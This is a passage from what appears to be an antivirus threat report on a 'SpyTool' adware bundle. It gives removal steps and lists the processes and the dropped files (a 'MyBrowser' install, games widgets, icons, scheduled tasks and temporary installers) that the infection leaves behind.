90871478e7b9765cccb884751bfafc7b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\pdf.dll |
4120c792ee30c922d95c5201cedade29 | c:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Program Files\MyBrowser\MyBrowser\Application\utility.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
upgmsd_re_005010096.exe:1276
nsf2B.tmp:1664
nsf2B.tmp:668
nswA.tmp:1336
gmsd_re_005010096.exe:592
nsr19.tmp:204
nsdF.tmp:1060
fsd34.exe:1692
nsw42.tmp:660
setup.exe:1356
taskkill.exe:1804
taskkill.exe:1796
taskkill.exe:660
nsj32.tmp:1912
amisid.exe:1952
amisid.exe:1844
tasklist.exe:1852
tasklist.exe:324
nss12.tmp:1616
9823.exe:320
nsx36.tmp:1468
encrypt.exe:1060
encrypt.exe:1476
encrypt.exe:1100
encrypt.exe:1584
nsx1C.tmp:1896
nsx1C.tmp:1088
nst25.tmp:1804
nsk6.tmp:204
%original file name%.exe:1736 - Delete the original SpyTool file.
- Delete or disinfect the following files created/modified by the SpyTool:
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.cyl (428 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp (4 bytes)
%Program Files%\gmsd_re_005010096\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.7z (7433 bytes)
%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-UGOR9.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-9SIQI.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\gmsd_re_005010096\unins000.msg (375 bytes)
%Program Files%\gmsd_re_005010096\gamesdesktop_widget.exe (77005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-LKR89.tmp (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\encrypt.exe (4185 bytes)
%Program Files%\gmsd_re_005010096\is-FEB6H.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-L9FO9.tmp (8657 bytes)
%Program Files%\gmsd_re_005010096\unins000.dat (29605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\itdownload.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\ex.bat (1564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-P9554.tmp (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.7z (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KUMK3.tmp\nsf2B.tmp (3781 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsnD.tmp (7695 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\gmsd_re_005010096\1.20\cnf.cyl (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1D.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_OperaRUnew[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1C.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\9823.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\OfferInstaller.exe (1617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst49.tmp (19514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\flush-inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\UserInfo.dll (4 bytes)
%Program Files%\AnyProtectEx\product.guid (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\System.dll (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\chrome.7z (1161171 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\FinalInstaller_dotnet4[1].exe (1479345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fsd34.exe (388270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\weather_channel.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bestbuy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\imdb.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\tripadvisor.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bbc.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\booking.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\hotels.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\espn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].001 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\netflix.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\huffingtonpost.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%WinDir%\Tasks\27A66B06-9E26-42DD-B887-47E55490B3.job (1644 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\forbes.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\kayak.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\mail.ru.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\setup.exe (37305 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\wikipedia.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\mail_live_msn.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bing.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\amazon.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\cnn.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\msn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\theguardian.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yandex.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\facebook.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\twitter.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\linkedin.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\chrome.packed.7z (1312726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_search.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nba.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\search.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\tumblr.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\icon.json (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\gizmodo.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\reddit.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\27A66B06-9E26-42DD-B887-47E55490B3\27A66B06-9E26-42DD-B887-47E55490B3.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ebay.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\skype.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\expedia.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3A.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3B.tmp (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd39.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.exe (92311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.exe (24230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.exe (1447 bytes)
